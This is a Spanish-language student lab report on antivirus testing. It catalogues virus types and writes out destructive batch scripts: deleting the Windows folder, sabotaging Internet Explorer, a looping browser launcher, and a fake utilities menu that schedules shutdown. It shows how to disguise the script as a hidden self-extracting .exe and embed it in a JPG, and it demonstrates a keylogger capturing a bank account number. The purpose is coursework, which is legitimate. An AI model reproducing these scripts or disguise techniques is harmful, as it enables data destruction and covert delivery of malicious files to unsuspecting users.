Sunteți pe pagina 1din 27

ACTIVIDADES CON ANTIVIRUS

Realizar las siguientes operaciones:

1.-Comparativa antivirus.

1.1.-Para realizar la comparativa tendremos que infectar nuestra maquina


con diferentes virus:

-Troyanos,
-Gusanos
-Virus residentes
La caracterstica principal de estos virus es que se ocultan en la memoria RAM
de forma permanente o residente. De este modo, pueden controlar e
interceptar todas las operaciones llevadas a cabo por el sistema operativo,
infectando todos aquellos ficheros y/o programas que sean ejecutados,
abiertos, cerrados, renombrados, copiados. Algunos ejemplos de este tipo de
virus son: Randex, CMJ, Meve, MrKlunky.
-Virus de boot (bot_kill) o de arranque
Los trminos boot o sector de arranque hacen referencia a una seccin muy
importante de un disco o unidad de almacenamiento CD, DVD, memorias USB
etc. En ella se guarda la informacin esencial sobre las caractersticas del disco
y se encuentra un programa que permite arrancar el ordenador. Este tipo de
virus no infecta ficheros, sino los discos que los contienen. Actan infectando
en primer lugar el sector de arranque de los dispositivos de almacenamiento.
Cuando un ordenador se pone en marcha con un dispositivo de
almacenamiento, el virus de boot infectar a su vez el disco duro.
Los virus de boot no pueden afectar al ordenador mientras no se intente poner
en marcha a ste ltimo con un disco infectado. Por tanto, el mejor modo de
defenderse contra ellos es proteger los dispositivos de almacenamiento contra
escritura y no arrancar nunca el ordenador con uno de estos dispositivos
desconocidos en el ordenador.
Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.
-Virus de enlace o directorio

Los ficheros se ubican en determinadas direcciones (compuestas bsicamente


por unidad de disco y directorio), que el sistema operativo conoce para poder
localizarlos y trabajar con ellos.
Los virus de enlace o directorio alteran las direcciones que indican donde se
almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero
con extensin EXE o COM) infectado por un virus de enlace, lo que se hace en
realidad es ejecutar el virus, ya que ste habr modificado la direccin donde
se encontraba originalmente el programa, colocndose en su lugar.
Una vez producida la infeccin, resulta imposible localizar y trabajar con los
ficheros originales.
-Virus polimrficos
Son virus que en cada infeccin que realizan se cifran de una forma distinta
(utilizando diferentes algoritmos y claves de cifrado). De esta forma, generan
una elevada cantidad de copias de s mismos e impiden que los antivirus los
localicen a travs de la bsqueda de cadenas o firmas, por lo que suelen ser
los virus ms costosos de detectar.
-Virus multipartites
Virus muy avanzados, que pueden realizar mltiples infecciones, combinando
diferentes tcnicas para ello. Su objetivo es cualquier elemento que pueda ser
infectado: archivos, programas, macros, discos, etc.
-Virus del fichero
Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y
COM). Al ejecutarse el programa infectado, el virus se activa, produciendo
diferentes efectos.
-Virus de FAT
La tabla de asignacin de ficheros o FAT (del ingls File AllocationTable) es la
seccin de un disco utilizada para enlazar la informacin contenida en ste. Se
trata de un elemento fundamental en el sistema. Los virus que atacan a este
elemento son especialmente peligrosos, ya que impedirn el acceso a ciertas
partes del disco, donde se almacenan los ficheros crticos para el normal
funcionamiento del ordenador.

1.2-Crea diferentes virus usando .bat y camuflarlo.

Crearemos varios archivos bat que realizarn acciones maliciosas en el


ordenador. Para ello el proceso ser siempre el mismo. Abriremos un archivo

de texto con el Bloc de Notas pondremos el cdigo necesario y guardaremos el


archivo con extensin .BAT. Por ejemplo:
Para borrar Windows.
echo off
del=c:windowsq
del=c:windows
deltree=c:windows

Para no iniciar el Explorer. Vemos que cambia el nombre del archivo


ejecutable del explorer.
@ echo off
c:
cd
cd *programa*
cd *explorer*
rename iexplore.exe iexplore.eve
exit

Para sobrecargar la memoria. Crea un bucle infinito iniciando una y otra vez el
buscador Google.
@echo off
:1
start www.google.com
goto 1
Vemos un pantallazo de los tres archivos bat.

Para crear otro ejemplo de virus creado con archivos batch crearemos un men
que nos abrir distintas herramientas de Windows 7, como Registro,
Programas, Restaurar Sistema, etc. Copiamos las lneas de comandos del
archivo en las prximas lneas:
@echo off
title Selecciona un color

:inicio
cls
echo

********************

echo

*****-=[MENU]=-*****

echo

********************

echo

1) Informacin Bsica del equipo

echo

2) Informacin Avanzada del equipo

echo

3) Centro de Actividades

echo

4) Administracin de equipo

echo

5) Programas

echo

6) Opciones de internet

echo

7) Monitor de Rendimiento

echo

8) Monitor de Recursos

echo

9) Administrador de Tareas

echo

10) Versin de WINDOWS

echo

11) Registro

echo

12) Solucin de Problemas

echo

13) Visor de Eventos

echo

14) Asistencia Remota

echo

15) Cambiar Configuracin UAC

echo

16) Restaurar Sistema

echo

********************

echo

17) Salir

echo

********************

echo.

set /p var=Seleccione una opcion [1-6]:

if "%var%"=="1" goto op1


if "%var%"=="2" goto op2
if "%var%"=="3" goto op3
if "%var%"=="4" goto op4
if "%var%"=="5" goto op5
if "%var%"=="6" goto op6
if "%var%"=="7" goto op7
if "%var%"=="8" goto op8
if "%var%"=="9" goto op9
if "%var%"=="10" goto op10
if "%var%"=="11" goto op11
if "%var%"=="12" goto op12
if "%var%"=="13" goto op13
if "%var%"=="14" goto op14
if "%var%"=="15" goto op15
if "%var%"=="16" goto op16

if "%var%"=="17" goto op17

if "%var%"=="17" goto salir

::Mensaje de error, validacin cuando se selecciona una opcin fuera de rango


echo. El numero "%var%" no es una opcion valida, por favor intente de nuevo.

echo.
pause
echo.
goto inicio

:op1
echo.
echo. Has elegido la opcion No. 1
echo
shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la
bola--"
color 08
echo.
pause
goto inicio

:op2
echo.
echo. Has elegido la opcion No. 2
echo
shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la
bola--"
color 09
echo.
pause
goto inicio

:op3
echo.
echo. Has elegido la opcion No. 3
echo.
C:\Windows\System32\wscui.cpl
color 0A
echo.
pause
goto inicio

:op4
echo.
echo. Has elegido la opcion No. 4
echo.
C:\Windows\System32\compmgmt.msc
color 0B
echo.
pause
goto inicio

:op5
echo.
echo. Has elegido la opcion No. 5
echo.

C:\Windows\System32\appwiz.cpl
color 0C
echo.
pause
goto inicio

:op6
echo.
echo. Has elegido la opcion No. 6
echo.
C:\Windows\System32\inetcpl.cpl
color 08
echo.
pause
goto inicio

:op7
echo.
echo. Has elegido la opcion No. 7
echo.
C:\Windows\System32\perfmon.exe
color 09
echo.
pause
goto inicio

:op8
echo.
echo. Has elegido la opcion No. 8
echo.
C:\Windows\System32\resmon.exe
color 0B
echo.
pause
goto inicio

:op9
echo.
echo. Has elegido la opcion No. 9
echo.
C:\Windows\System32\taskmgr.exe
color 0C
echo.
pause
goto inicio

:op10
echo.
echo. Has elegido la opcion No. 10
echo.

C:\Windows\System32\cmd.exe
color 08
echo.
pause
goto inicio

:op11
echo.
echo. Has elegido la opcion No. 11
echo.
C:\Windows\System32\regedt32.exe
color 09
echo.
pause
goto inicio

:op12
echo.
echo. Has elegido la opcion No. 12
echo.
C:\Windows\System32\control.exe /name Microsoft.Troubleshooting
color 0B
echo.
pause
goto inicio

:op10
echo.
echo. Has elegido la opcion No. 10
echo.
C:\Windows\system32\winver.exe
color 0C
echo.
pause
goto inicio

:op13
echo.
echo. Has elegido la opcion No. 13
echo.
C:\Windows\System32\eventvwr.exe
color 08
echo.
pause
goto inicio

:op14
echo.
echo. Has elegido la opcion No. 14
echo.

C:\Windows\System32\msra.exe
color 09
echo.
pause
goto inicio

:op15
echo.
echo. Has elegido la opcion No. 15
echo.
C:\Windows\System32\UserAccountControlSettings.exe
color 0B
echo.
pause
goto inicio

:op16
echo.
echo. Has elegido la opcion No. 16
echo.
C:\Windows\System32\rstrui.exe
color 0C
echo.
pause
goto inicio

:salir
@cls&exit

Lo llamaremos UTILIDADES WINDOWS 7.BAT. En las opciones 1 y 2


colocaremos un comando que nos apagar el ordenador en un tiempo
determinado por nosotros.
shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta -para la bola--"

Tambin nos abrir una ventana con un mensaje que nos advertir de ese
hecho y la manera de evitarlo (para evitar el apagado deberemos ejecutar el
archivo para la bola.bat).

Si ejecutamos el archivo para la bola.bat evitaremos el apagado del sistema.

puesto que lo hemos hecho usando el comando del Ms-Dos Shutdown, el


archivo para la bola.bat tiene la orden del comando shutdown a que
paraliza el apagado.

Cambiar archivo . bat a .exe.


Para camuflar el archivo UTILIDADES WINDOWS 7.BAT podemos cambiarlo a
fichero .exe. Para ello utilizaremos el winrar.
Primero seleccionamos con el botn derecho el archivo UTILIDADES
WINDOWS 7.BAT y elegimos "aadir al archivo"

Al hacer clic en la opcin Crear un archivo autoextrable ya vemos que nos


cambia la extensin de .bat a .exe.

Despus elegimos la pestaa Avanzado y seleccionamos Autoextrable...

en la siguiente ventana que nos saldr elegimos Instalacin y en la opcin


Ejecutar tras la extraccin ponemos el nombre original del archivo .bat que
queremos cambiar a .exe.

Como no queremos que se


muestre la extraccin ni la ejecucin
iremos a Modos y seleccionamos
Ocultar Todo.

Tambin iremos a Actualizar y


seleccionamos Preguntar antes de
sobrescribir.

Para ponerle un icono iremos a Texto e


icono y en Examinar... seleccionamos el
que queramos.

Ahora haremos clic en Aceptar y en la siguiente ventana tambin en Aceptar.


Se nos habr creado el archivo UTILIDADES WINDOWS 7.exe.

Para poder camuflar archivos en una foto debemos crear una


carpeta en C:\ a la que llamaremos X. En ella pondremos una foto (koala.jpg)
y los archivos que queramos ocultar, en este caso UTILIDADES
WINDOWS7.exe y para la bola.bat.

Luego los seleccionamos y clicando en botn derecho pulsamos en aadir a


X.rar.

Nos crear como vemos abajo el archivo X.rar. Borraremos ahora los archivos
que queremos ocultar y dejamos solo la foto y el archivo comprimido que
hemos creado.

Ahora abrimos el CMD vamos al directorio C:\ donde est la carpeta X luego
escribimos cd X para entrar en la carpeta X y escribiremos copy /B koala.jpg +
X.rar Secret.jpg. As crearemos el archivo Secret.jpt que contendr los
archivos koala.jpg y X.rar

Vemos aqu el archivo recin creado Secret.jpg. Borraremos los otros dos y ya
tendremos un archivo que parece una foto pero contiene otros dos archivos
(UTILIDADES DE WINDOWS 7.exe y para la bola.bat).Para comprobarlo lo
abriremos con winrar y vemos que estn comprimidos en Secret.jpg.

Ya solo tendremos que extraerlos del archivo secret.jpg y podremos disponer


de los dos archivos . Lo vemos abajo que al extraer el contenido nos crea una
carpeta llamada Secret y los extrae en ella.

Tabla programas antivirus

Calificacion

#1
Bitdefender
Antivirus
2015

#2
Kaspersky
Antivirus
2015

#3
Panda
Antivirus
Pro 2015

Deteccin de Malware
25
Ninguna
12
amenazas
amenazas
detectadas

Cuantas
amenazas
detecta?

Limpieza
exitosa de
malware
activos

Todas

En demanda
en segundos3

Limpieza de Infeccin
Ninguna
Todas

#4
McAfee
Internet
Security
2015

#5
Avast Pro
Antivirus

18
amenzas

A.Rpido:
11
amenazas
A.
Completo:
13
amenazas

15

Todas

Escaneo de Velocidad
2 horas 45
Anlisis
Anlisis: 19 3 horas
minutos
Completo:
minutos
13
6 horas
10
minutos
Anlisis
segundos
Rpido: 2
min. 42
seg.

Anlisis
Completo:
1 hora 34
min.
Anlisis
Rpido:
22 min. 20
seg.

Interface
Es fcil?

Kaspersky Antivirus 2015, Avast Pro Antivirus, y Panda Antivirus Pro 2015
(nosotros utilizamos el Panda Cloud Cleaner) han realizado las pruebas en un
equipo con windows Xp, Disco Duro de 40 Gb y 1 Gb de memoria RAM.
BitDefender Antivirus y McAffee Internet Security 2015 realizaron las
pruebas en un equipo con Windows XP, Disco Duro 60 Gb y 1 Gb de memoria
Ram.

2.-Busca un KEYLOGGER y ponlo en prctica.

Instalamos el Keylogger llamado Revealer Keylogger. Lo iniciamos y


pulsamos en Inicio.

Despus iniciaremos el navegador Firefox desde donde abriremos la pgina


Youtube y all abriremos el video banda sonora de El ltimo mohicano.
Despus en el bloc de notas creamos un documento con el texto Documento
confidencial para banco y Cuenta bancaria 1200-21-2345-2332232 que
guardaremos con el nombre de Cuenta del banco. Como vemos en la
pantalla de abajo en la seccin Pulsaciones de tecla ha quedado grabado
todo lo que hemos tecleado.

Para finalizar la grabacin del Keylogger solo deberamos pulsar en Detener.


Al tratarse de una versin de prueba la opcin Capturas de pantalla est
deshabilitada.

S-ar putea să vă placă și